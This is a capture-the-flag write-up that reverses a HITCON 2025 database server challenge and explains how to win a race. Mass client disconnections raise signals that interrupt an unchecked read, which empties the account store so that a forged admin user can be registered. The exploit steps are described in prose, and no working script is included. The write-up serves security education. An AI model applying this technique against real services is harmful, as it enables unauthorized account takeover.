Exploiting a tricky race condition

This is a writeup for the concurrent-safe-db challenge, which was part of HITCON 2025 CTF, that I played together with the Organizers.

The challenge was placed in the misc category, but it might as well have been placed into pwn, as you will see later.

On a surface level the challenge's name and description suggest a DB software, and that it properly handles concurrency, but let's dive in more to see if that is done correctly.

Exploiting a tricky race condition

Initial reversing

The challenge gives us the server binary that we can interact with remotely, so let's look more at what it does in ghidra.

main just calls another function, from which we can see 5 function calls. The (already renamed) function calls are as follows:

void start_chall(void)

{
  setup_sig_handler();
  init();
  create_admin_user();
  setup_sig_blocking();
  accept_clients(0x2253,handle_client);
  return;
}

setup_sig_handler computes a 64-byte random value, which is used later by init, which will be used to setup sockets. Additionally it will also alarm the binary to 180 seconds, or 3 minutes.

The signal handler function is triggered on SIGCHLD and SIGPIPE, and looks as follows:

void on_client_finish(void)

{
  long in_FS_OFFSET;
  uint local_18;
  __pid_t local_14;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  while (local_14 = waitpid(0,(int *)&local_18,1), 0 < local_14) {
    if ((local_18 & 0x7f) == 0) {
      LOCK();
      DAT_client_counter = DAT_client_counter + -1;
      UNLOCK();
    }
  }
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

The function has to do with decrementing the counter of clients connected to the server, but as you can see there's a LOCK-UNLOCK pair, which is the way ghidra's decomipler displays an instruction with a lock prefix. The prefix essentially turns that instruction that it prefix into an atomic instruction, you can read more about it here.

So we already see the first signs of concurrency handling in the binary.

The init function is responsible for setting up the temporary file for the database, as well as starting the reader and the writer thread, and setting up the communication between the threads and the DB.

Next up is the create_admin_user function let's look more into how that works, to understand how the DB functions from the client's point of view.

void create_admin_user(void)

{
  int iVar1;
  long in_FS_OFFSET;
  int local_209c;
  char local_2098 [65];
  byte abStack_2057 [8263];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  iVar1 = read_from_db(local_2098);
  if (iVar1 != 1) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  strncpy(local_2098,"admin",0x40);
  getrandom(abStack_2057,0x40,0);
  for (local_209c = 0; local_209c < 0x40; local_209c = local_209c + 1) {
    abStack_2057[local_209c] = abStack_2057[local_209c] % 0x5e + 0x21;
  }
  iVar1 = write_db(local_2098);
  if (iVar1 != 1) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

The client downloads the entire databse using read_from_db
The client makes modifications to the DB content as a whole directly and locally.
The client pushes the entire updated DB to the server with write_db

The admin user is added with a random 64-byte password in the ASCII range.

The next setup function is setup_sig_blocking:

void setup_sig_blocking(void)
{
  long in_FS_OFFSET;
  sigset_t local_98;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  sigfillset(&local_98);
  pthread_sigmask(0,&local_98,(__sigset_t *)0x0);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Let's read what the pthread_sigmask function does, since I'm not too familiar with it.

The pthread_sigmask() function is just like sigprocmask(2), with the difference that its use in multithreaded programs is explicitly specified by POSIX.1. Other differences are noted in this page. For a description of the arguments and operation of this function, see sigprocmask(2).

It seems like this is a threaded version for the sigprocmask call, so let's read that one as well!

DESCRIPTION Refer to pthread_sigmask().

Well, wonderful, a cyclic reference.

However, the example in the pthread_sigmask man page is more useful!

The program below blocks some signals in the main thread, and then creates a dedicated thread to fetch those signals via sigwait(3). The following shell session demonstrates its use:

The call blocks some signals from reaching the calling thread, and in our case we can see it is initialized with sigfillset, so all signals would be blocked.

This will turn out to be quite and important part of the challenge, however initially it didn't seem to make sense. We've just looked at a signal handler for disconnecting clients, and with a debugger, we could even verify that the signal handler was called, so clearly not all signals were blocked. It is also easy to dismiss this signal handling stuff, as just part of challenge setup and not where the vulnerability lies.

Finally the binary will call accept_clients, which will be where we can interact with the challenge. This is just a standard socket server setup:

void accept_clients(short port,undefined *param_2)

{
  uint16_t uVar1;
  int iVar2;
  char *pcVar3;
  undefined6 in_register_0000003a;
  long in_FS_OFFSET;
  undefined4 local_58;
  socklen_t local_54;
  int local_50;
  int local_4c;
  sockaddr local_48;
  undefined local_38 [24];
  undefined8 local_20;

  local_20 = *(undefined8 *)(in_FS_OFFSET + 0x28);
  local_50 = socket(2,1,0);
  if (local_50 < 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  local_58 = 1;
  iVar2 = setsockopt(local_50,1,2,&local_58,4);
  if (iVar2 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  memset(&local_48,0,0x10);
  local_48.sa_family = 2;
  local_48.sa_data._2_4_ = htonl(0);
  local_48.sa_data._0_2_ = htons(port);
  iVar2 = bind(local_50,&local_48,0x10);
  if (iVar2 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  iVar2 = listen(local_50,10);
  if (iVar2 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  log(2,"Listening at 0.0.0.0:%d\n",CONCAT62(in_register_0000003a,port) & 0xffffffff);
  local_54 = 0x10;
  do {
    do {
      local_4c = accept(local_50,(sockaddr *)local_38,&local_54);
      uVar1 = ntohs(local_38._2_2_);
      pcVar3 = inet_ntoa((in_addr)local_38._4_4_);
      log(2,"Connection accepted from %s:%d\n",pcVar3,uVar1);
    } while (local_4c < 0);
    (*(code *)param_2)(local_4c);
  } while( true );
}

The server will then call a callback (param_2 - seems like I didn't rename this):

void handle_client(int fd)

{
  long lVar1;
  __pid_t _Var2;
  long in_FS_OFFSET;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  if (DAT_client_counter < 0x40) {
    DAT_client_counter = DAT_client_counter + 1;
    LOCK();
    UNLOCK();
    _Var2 = fork();
    if (_Var2 == 0) {
      prctl(1,9);
      close(DAT_db_fd);
      close(0);
      close(1);
      dup2(fd,0);
      dup2(fd,1);
      close(fd);
      handle_first_menu();
    }
    close(fd);
  }
  else {
    write(fd,"Server is busy\n",3);
    close(fd);
  }
  if (lVar1 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

Here we see that a maximum of 64 clients are allowed, and similarly to the client disconnection handler we see that appearence of LOCK and UNLOCK. The decompiler is a bit tricked by the ASM here, but inspecting the assembly we see that the increment is safe (it is using a cmpxchg construction).

Client interaction

The first menu is as such:

1) register
2) login
3) bye

We can register a user, login and close the connection. Logging in will grant us access to the second menu, where we can do more.

The second menu:

1) logout
2) unregister
3) get flag
4) bye

logout - will take us back to the first menu
unregister - which will remove the user we are currently logged in as
get flag - will check if our username is admin, and if so read the flag from the file system and send it to us
bye - will terminate the connection

So to get the flag we need to somehow login as the admin user, but remember from the start, that the admin user has a 64-byte random (ASCII) password, so we can't just log in as the admin user.

A logical next step is to investigate the login function, to see if there's any vulnerability which would allow the login without a correct password.

account * login(void)

{
  int mid;
  int iVar1;
  long in_FS_OFFSET;
  int bs_left;
  int bs_right;
  account *acc_found;
  char local_a8 [80];
  char local_58 [72];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("Username: ");
  mid = __isoc23_scanf("%64s",local_a8);
  if ((mid != 1) || (local_a8[0] == '\0')) {
    puts("Invalid input");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  printf("Password: ");
  mid = __isoc23_scanf("%64s",local_58);
  if ((mid != 1) || (local_58[0] == '\0')) {
    puts("Invalid input");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  read_from_db(account_ARRAY_0010d5a0);
  acc_found = (account *)0x0;
  bs_left = 0;
  bs_right = 0x3f;
  while (bs_left <= bs_right) {
    mid = bs_right + bs_left >> 1;
    if (account_ARRAY_0010d5a0[mid].username[0] == '\0') {
      bs_right = mid + -1;
    }
    else {
      iVar1 = strncmp(local_a8,account_ARRAY_0010d5a0[mid].username,0x40);
      if (iVar1 == 0) {
        acc_found = account_ARRAY_0010d5a0 + mid;
        break;
      }
      if (iVar1 < 0) {
        bs_right = mid + -1;
      }
      else {
        bs_left = mid + 1;
      }
    }
  }
  if (acc_found != (account *)0x0) {
    mid = strncmp(local_58,acc_found->password,0x40);
    if (mid == 0) {
      printf("Login succeed. Hello %s!\n",acc_found);
      goto LAB_00103938;
    }
  }
  puts("Username or password not found");
  acc_found = (account *)0x0;
LAB_00103938:
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return acc_found;
}

The function is a bit longer than the others, but here's an overview of what happens:

read username from the client
read password from the client
download the entire DB (remember earlier during the admin user creation, we always download the entire DB)
Binary search for the username given by the user (when inserting new users in register they always make sure to keep the DB sorted by username lexicographically ascending)
Check the password of the matched username using strncmp

It does not seem like there's anything exploitable here, neither username nor password can start with a null byte from the user input, the binary search looks like a solid implementation. There also doesn't seem to be any concurrency issues, since we only download the DB, which already contains the admin user, and the only way to get a state without the admin user would require us to first login and then unregister it.

We can also check the register function for any vulns:

void register(void)

{
  int iVar1;
  long in_FS_OFFSET;
  int local_b8;
  int local_b4;
  int local_b0;
  char username [80];
  char password [72];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("Username: ");
  iVar1 = __isoc23_scanf("%64s",username);
  if ((iVar1 != 1) || (username[0] == '\0')) {
    puts("Invalid input");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  printf("Password: ");
  iVar1 = __isoc23_scanf("%64s",password);
  if ((iVar1 != 1) || (password[0] == '\0')) {
    puts("Invalid input");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  local_b8 = 0;
  do {
    if (4 < local_b8) {
      puts("Server is too busy");
LAB_001036d2:
      if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
        __stack_chk_fail();
      }
      return;
    }
    read_from_db(DAT_accounts);
    local_b0 = 0;
    local_b4 = 0;
    while ((local_b4 < 0x40 && (DAT_accounts[local_b4].username[0] != '\0'))) {
      iVar1 = strncmp(username,DAT_accounts[local_b4].username,0x40);
      if (iVar1 == 0) {
        puts("Username already exists");
        goto LAB_001036d2;
      }
      if (0 < iVar1) {
        local_b0 = local_b4 + 1;
      }
      local_b4 = local_b4 + 1;
    }
    if (local_b4 == 0x40) {
      puts("Too many users");
      goto LAB_001036d2;
    }
    memmove(DAT_accounts + (local_b0 + 1),DAT_accounts + local_b0,(long)(local_b4 - local_b0) * 0x82
           );
    memset(DAT_accounts + local_b0,0,0x82);
    strncpy(DAT_accounts[local_b0].username,username,0x41);
    strncpy(DAT_accounts[local_b0].password,password,0x41);
    iVar1 = write_db(DAT_accounts);
    if (iVar1 == 1) {
      puts("Success");
      goto LAB_001036d2;
    }
    local_b8 = local_b8 + 1;
  } while( true );
}

But again there doesn't seem to be anything exploitable.

username and password can't start with a null byte. The exploit here would be to register a user with a null byte as the first char, which would come before admin when sorted. Then we could register admin again, since the null byte indicates the end of the user list to the username search function.
we can't insert duplicate usernames, since the existing list of users is checked first
there's no off-by-one or such in the memmove that would allow to overwrite the admin user

Looking for the wrong race condition

Circling back to the challenge name and description, the bug must be something related to concurrency. However we already saw the CPU lock prefix instructions for keeping track of the user list.

A logical next step is to analyze the DB update mechanism itself, however there are quite some limitations on this front as well.

The first major pain, is the way that DB updates are done. The client fetches the entire DB and pushes the entire DB when an update needs to happen. That is, even if there was a race condition in how the DB is updated, we are always limited to changing the entire DB and not only parts of it.

Furthermore, analyzing the code we can see that all read_from_db calls are done to separate buffers. So each functionality, such as register and login do not share a buffer at all, which might be able to cause some vulnerability.

Let's look more into how DB writes are done:

void thread_writer(int param_1)

{
  int iVar1;
  long in_FS_OFFSET;
  char local_11;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_11 = '\x01';
  memset(account_ARRAY_00109440,0,0x2084);
  write(param_1,&local_11,1);
  log(3,"Reading data from the client...\n");
  read(param_1,account_ARRAY_00109440,0x2080);
  read(param_1,&DAT_0010b4c0,4);
  iVar1 = pthread_mutex_lock((pthread_mutex_t *)&DAT_db_mutex);
  if (iVar1 == 0) {
    local_11 = DAT_0010b4c0 == DAT_db_version;
    write(param_1,&local_11,1);
    if (local_11 == '\x01') {
      DAT_db_version = DAT_db_version + 1;
      log(1,"Writing data to the backing storage...\n");
      lseek(DAT_db_fd,0,0);
      write(DAT_db_fd,account_ARRAY_00109440,0x2080);
      fsync(DAT_db_fd);
      log(1,"Successfully writing data to the backing storage\n");
    }
    else {
      log(1,"Invalid data from client\n");
    }
    pthread_mutex_unlock((pthread_mutex_t *)&DAT_db_mutex);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

This is all done by the thread_writer function, which is the thread that handles writes to the database.

This reads the entire DB from the client (0x2080 bytes) as well as a 4 byte additional value. By also considering the read function, we know that the 4 byte value is like a DB version, initially set to 1, and as you can see in the thread_writer function incremented on every update.

Updates are only accepted if the DB version the client knows about matches the one the server knows about currently. Thus an update with a stale DB content would be rejected by the server.

Also notice how we have a pthread_mutex_lock call, once the thread starts to touch data that is considered a shared resource, such as the global DB content and the version counter.

They also take care of potential concurrency issues on the file system level, by doing fsync after the write.

So indeed chances of having some concurrency issues looks pretty bleak, we need to find some other way to exploit the system.

An unreasonable exploit

After staring a lot at the register and login functions, something occured to me!

    read_from_db(DAT_accounts);
    local_b0 = 0;
    local_b4 = 0;
    while ((local_b4 < 0x40 && (DAT_accounts[local_b4].username[0] != '\0'))) {
      iVar1 = strncmp(username,DAT_accounts[local_b4].username,0x40);
      // [...]

You might notice, that after we read from the DB, we just start looking at the user accounts that we have received in the register function.

Now also take a look at how the writing is done a bit further below:

    iVar1 = write_db(DAT_accounts);
    if (iVar1 == 1) {
      puts("Success");
      goto LAB_001036d2;
    }
    local_b8 = local_b8 + 1;
  } while( true );
  // [...]

Notice how here, we account for the fact that a write could fail, and keep retrying (up to 5 times) before giving up. However, checks for the result of the read_from_db function are completely missing in both the register and the login functions.

Contrast this with the function which registers the admin user at the start:

  // [...]
  iVar1 = read_from_db(local_2098);
  if (iVar1 != 1) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  // [...]

Is this bug exploitable?

Let's understand what it means for the read_from_db to fail:

In case the account buffer for the given function has not been read into yet, we just end up with all null bytes for the account buffer.
In case the account buffer was read into previously, we keep the stale version of the DB, instead of updating it.

Now, how is this useful?

For login, we know it isn't:

logging in with an empty buffer means there are no users, hence the login fails
logging in with a stale buffer will still contain the admin user with the proper credentials

For register, however it could be useful:

registering with an empty buffer means there is no admin user, so we can create one with an arbitrary password.
registering with a stale buffer is not useful, as the admin user would be already there

This would be an amazing exploitation idea if not for how DB updates work.

Recall from the previous section that thread_writer will first check the DB version and only accept the update if it matches the latest one on the server. In the case of the empty buffer - which we want to exploit - the DB version would also be uninitialized, and hence be zero. However, on the server the starting version is 1, which means that the server would reject the update that we can achieve by registering on top of the empty buffer.

Looking at the version counter, we see that it's a 4-byte value, so initially we might think about an overflow here, where a possible attack would look like:

Create around UINT_MAX updates to the DB, such that the counter becomes zero
Make the read call fail on register and register the admin user on top of the empty buffer (now the update is accepted, because the counter is zero)
login as the admin user and get the flag

The only issue is that even with minimal data in the requests it's a lot of data to transfer, and remember that we also have a time limit of 3 minutes before the server closes, because of the alarm.

So although in theory this would be an attack path, in practice the constraints imposed by the challenge do not allow us to pull this off.

Before I continue, perhaps let's look into an aspect that I have not visited at the start of this section, namely how is it even possible for the read call to fail.

Making read fail

If we look at the read_from_db function, we can see execution paths where we return a negative value.

ulong read_from_db(void *param_1)

{
  ulong uVar1;
  long in_FS_OFFSET;
  byte local_15;
  int local_14;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_14 = connect_to_srv(&DAT_reader_conn);
  if (local_14 < 0) {
    uVar1 = 0xffffffff;
  }
  else {
    local_15 = 0;
    read(local_14,&local_15,1);
    if (local_15 == 0) {
      log(1,"Failed to read data from the DB\n");
    }
    else {
      log(3,"Reading data from the DB...\n");
      read(local_14,param_1,0x2080);
      read(local_14,(void *)((long)param_1 + 0x2080),4);
      log(2,"Successfully reading data from the DB\n");
    }
    close(local_14);
    uVar1 = (ulong)local_15;
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar1;
}

If connection to the server fails, we return -1
If the server sends 0 as the first byte, we return 0

Outside of these 2 cases we always return the first byte we saw from the server.

For case 1 we have:

int connect_to_srv(undefined8 *param_1)

{
  long lVar1;
  int __fd;
  int iVar2;
  long in_FS_OFFSET;
  sockaddr socket_info;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  __fd = socket(1,1,0);
  if (__fd < 0) {
    __fd = -1;
  }
  else {
    memset(&socket_info,0,0x6e);
    socket_info.sa_family = AF_UNIX;
    socket_info.sa_data._0_8_ = *param_1;
    unique0x0000c300 = param_1[1];
    iVar2 = connect(__fd,&socket_info,0x6e);
    if (iVar2 != 0) {
      __fd = -1;
    }
  }
  if (lVar1 == *(long *)(in_FS_OFFSET + 0x28)) {
    return __fd;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

Here we see the possibilities are:

Can't create a socket - this is pretty unlikely to happen
Can't connect to the server

It's important to note here that this server we are connecting to is not the socket server that is exposed as the remote for the challenge, but rather the 2 UNIX sockets that are created for the reader and the writer thread.

Let's look at how those sockets are setup:

void FUN_0010293e(undefined8 *param_1,code *callback)

{
  int __fd;
  int iVar1;
  sockaddr local_98;

  __fd = socket(1,1,0);
  if (__fd < 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  memset(&local_98,0,0x6e);
  local_98.sa_family = 1;
  local_98.sa_data._0_8_ = *param_1;
  unique0x0000c300 = param_1[1];
  iVar1 = bind(__fd,&local_98,0x6e);
  if (iVar1 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  iVar1 = listen(__fd,10);
  if (iVar1 != 0) {
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  do {
    do {
      iVar1 = accept(__fd,(sockaddr *)0x0,(socklen_t *)0x0);
    } while (iVar1 < 0);
    (*callback)(iVar1);
    close(iVar1);
  } while( true );
}

A socket is created, but pay special attention to the backlog value of 10 in the listen call. After this, we just accept new connections in a loop and call the callback function, which is either the thread_reader or the thread_writer.

Importantly, the callback is already the function which will do the requested computation, and it doesen't fork or spawn a new thread. So for the duration the thread_writer or the thread_reader function is executing there won't be any new clients accepted. Coupled with the observation about the backlog this would make the connection to the server fail, and thus read_from_db would have an empty buffer.

But as we noted already, the close to UINT_MAX DB updates make this attack route infeasible.

A similar attack at a different spot

After realizing this exact attack won't work for the register function, and in general anywhere where it could be useful, due to the DB version counter, I started looking elsewhere.

The core of the issue is that the return value of the read was not checked, therefore the computation went ahead with empty data. But perhapas there are other places in the binary then, where the result of the read call is not checked?

Let's turn out attention to thread_writer, which gives the DB contents to the user:

void thread_writer(int param_1)

{
  int iVar1;
  long in_FS_OFFSET;
  char local_11;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_11 = '\x01';
  memset(account_ARRAY_00109440,0,0x2084);
  write(param_1,&local_11,1);
  log(3,"Reading data from the client...\n");
  read(param_1,account_ARRAY_00109440,0x2080);
  read(param_1,&DAT_0010b4c0,4);
  iVar1 = pthread_mutex_lock((pthread_mutex_t *)&DAT_db_mutex);
  if (iVar1 == 0) {
    local_11 = DAT_0010b4c0 == DAT_db_version;
    write(param_1,&local_11,1);
    if (local_11 == '\x01') {
      DAT_db_version = DAT_db_version + 1;
      log(1,"Writing data to the backing storage...\n");
      lseek(DAT_db_fd,0,0);
      write(DAT_db_fd,account_ARRAY_00109440,0x2080);
      fsync(DAT_db_fd);
      log(1,"Successfully writing data to the backing storage\n");
    }
    else {
      log(1,"Invalid data from client\n");
    }
    pthread_mutex_unlock((pthread_mutex_t *)&DAT_db_mutex);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

The functionality is quite straight forward:

Empty the buffer which it will use to receive the DB and the version counter from the client
Read the DB from the socket
Read the version counter from the socket
Persist changes to the global state, if the version counter matches

Critically, you may notice here that the result of both read calls are not checked. As such, if one of the calls would fail, and not populate the buffer, we could end up with inconsistent and possibly exploitable state.

Breaking the read for the version counter is useless, we would just have an mismatch compared to the server's view and the update would be rejected.

Breaking the read call for the DB contents however, is quite useful, since we could essentially continue with an empty database if the version counter is correctly read afterwards. Subsequently, having an empty DB would allow us to register the admin user with a custom password, then log in and then get the flag.

Pulling this off however, will be quite tricky. The version counter, needs to match the server's so we should supply it, therefore we can't make the read call fail by disconnecting the client socket.

The man page this time comes in handy however, by listing all the possible errors that could happen to the read call:

ERRORS
       EAGAIN The  file  descriptor  fd refers to a file other than a socket and has been marked nonblocking (O_NON‐
              BLOCK), and the read would block.  See open(2) for further details on the O_NONBLOCK flag.

       EAGAIN or EWOULDBLOCK
              The file descriptor fd refers to a socket and has been marked nonblocking (O_NONBLOCK), and  the  read
              would  block.   POSIX.1-2001  allows  either  error to be returned for this case, and does not require
              these constants to have the same value, so a portable application should check for both possibilities.

       EBADF  fd is not a valid file descriptor or is not open for reading.

       EFAULT buf is outside your accessible address space.

       EINTR  The call was interrupted by a signal before any data was read; see signal(7).

       EINVAL fd is attached to an object which is unsuitable for reading; or the file was opened with the  O_DIRECT
              flag, and either the address specified in buf, the value specified in count, or the file offset is not
              suitably aligned.

       EINVAL fd  was  created  via  a  call to timerfd_create(2) and the wrong size buffer was given to read(); see
              timerfd_create(2) for further information.

       EIO    I/O error.  This will happen for example when the process is in a background process group,  tries  to
              read from its controlling terminal, and either it is ignoring or blocking SIGTTIN or its process group
              is orphaned.  It may also occur when there is a low-level I/O error while reading from a disk or tape.
              A  further  possible cause of EIO on networked filesystems is when an advisory lock had been taken out
              on the file descriptor and this lock has been lost.  See the Lost locks section of fcntl(2)  for  fur‐
              ther details.

       EISDIR fd refers to a directory.

       Other errors may occur, depending on the object connected to fd.

Going through the list, most don't seem to be useful to us:

It's not a non-blocking fd, so those errors already don't apply
The output buffer is in valid address space
The fd is valid, not a directory and the underlying object (i.e the socket) supports reading

However EINTR seems quite interesting, it says:

The call was interrupted by a signal before any data was read; see signal(7).

So, if there would happen to be a signal, while the read call is being processed on the kernel side, and a signal would be raised, we could make the read call fail, just for this occasion. The race is quite tight, we have time until 0x2080 bytes are read from a UNIX socket, which should be relatively fast, but doable with some repetitions.

We still have some open questions, before the exploit can work:

How do we make sure, the next read call will have the proper DB version counter value (otherwise the update is rejected)
How do we trigger signals, such that they would interrupt the read call

Let's tackle these pointes one by one

Ensuring proper DB version counter

If the first read call fails, it means that all client data still in queue is available on the next call. This means that the next call will essentially read the first 4 bytes of the entire client data for this operation. That is, the first 4 bytes of the first username in the DB content coming from the client.

Now remember how the user addition works in register:

The first byte can't be a null byte
We can use any bytes that survive scanf("%s") - this means a heavy restriction on whitespace characters.
The usernames are sorted lexicographically in ascending order

So we are limited in the choice of DB versions we can try, namely the only numbers we can try are:

Not zero in the least significant byte
Don't contain any bytes that correspond to ASCII whitespace
Lexicographically compare less than admin

In our attack, we will keep track of the server's version counter on the client side, and will create a user that has a username that is the version counter. If the version counter would not end up as the first user, or it has bytes that we can't input, we simply create a dummy user and continue the attack until we have a better version counter on the server.

Interrupting read

You may remember we visited a function called setup_sig_blocking at the start of the post. We concluded the purpose of this function is to block all incoming signals, but confirmed that this is not exactly the case. One might wonder what exactly is the case here, and how we can trigger a signal that interrupts read in this case.

Documentation was a bit lacking about signal blocking, but the example kind of leads us in the right direction.

int
       main(void)
       {
           pthread_t thread;
           sigset_t set;
           int s;

           /* Block SIGQUIT and SIGUSR1; other threads created by main()
              will inherit a copy of the signal mask. */

           sigemptyset(&set);
           sigaddset(&set, SIGQUIT);
           sigaddset(&set, SIGUSR1);
           s = pthread_sigmask(SIG_BLOCK, &set, NULL);
           if (s != 0)
               handle_error_en(s, "pthread_sigmask");

           s = pthread_create(&thread, NULL, &sig_thread, &set);
           if (s != 0)
               handle_error_en(s, "pthread_create");

           /* Main thread carries on to create other threads and/or do
              other work. */

           pause();            /* Dummy pause so we can test program */
       }

They setup a much smaller set than all signals, then use the pthread_sigmask function. They also note that threads spawned by main will inherit this signal mask.

From this we understand that the signal mask definitely applies to the process/main thread itself, and also that threads created by it inherit the signal mask. Yet, if we check with gdb by setting a breakpoint on the client exit signal handler function (on_client_finish), we see it is hit.

More importantly, we can check which thread we break in, and perhaps surprisingly it's thread 2, corresponding to thread_writer.

So, indeed the signal reaches the thread which runs thread_writer. My observation is that the reader and writer threads are started before the signal blocking is setup, and thus they might not inherit the signal mask retroactively. And when the forked client process exits and raises the signal, the first thread which isn't blocking the signal will be the one to handle it.

And so we have a way to try and race for the interruption of the read call through client disconnections.

Putting it all together

Now we have a clear path to exploit the challenge binary:

Connect 64 clients (this is the limit defined by the server)
On separate threads start mass disconnecting 63 clients and have one thread, which registers the user with the current DB version counter
After all threads finish their goal (i.e disconnecting or registering the user), unregister the user we created for the current DB version counter
Repeat this process for the majority of the 3 minute time limit (because of the alarm)
If at any point we won the race, then there will be no admin user at the end of the attack, so try to register it, login as admin and get the flag.

There are some practical aspects to pulling off this attack, where I have to give credit to my teammate gallileo.

My initial attack was a single python script with multiple threads and I tried running the script from my machine against the remote. There is a couple of issues with this:

The race is quite tight, and so the way threading and sockets are done in python might not be fast enough
Attacking from my machine has quite some latency toe the servers and a co-located server will have a better chance.

He wrote a golang script for the simpler disconnect spams, while using the original python script for the more complex logic of the user registration thread. He also wrote a script to automate the process of registering the admin user, logging in and getting the flag.

This was enough for us to solve the challenge and submit the flag, being one of the 2 teams which were able to solve this task during the competition.

Summary

To summarize, this challenge presents an interesting aspect on attacking concurrency.

In many of the obvious places, concurrency is handled well, with CPU instruction prefixes, such as lock and lockless constructions such as cmpxchg. In other places we saw the use of the pthread mutex and version counters to ensure globally consistent DB state.

It is interesting that the core issue happens to be proper error handling instead of a concurrency bug. Had the challenge handled the return value of the read calls, even a successful race to interrupt the read call with a signal would not have lead to exploitation.

We have also learnt more about signal handling and specifically pthread_sigmask. In fact, after chatting with the author, it turns out pthread_sigmask was considered a hint/nudge in the right direction by them, which was required to make the race more winnable/consistent. While I sort of experienced it as a factor of confusion due to the lack of proper documentation, in hindsight it is an unusual construct in CTF challenges, and should have warranted a closer look.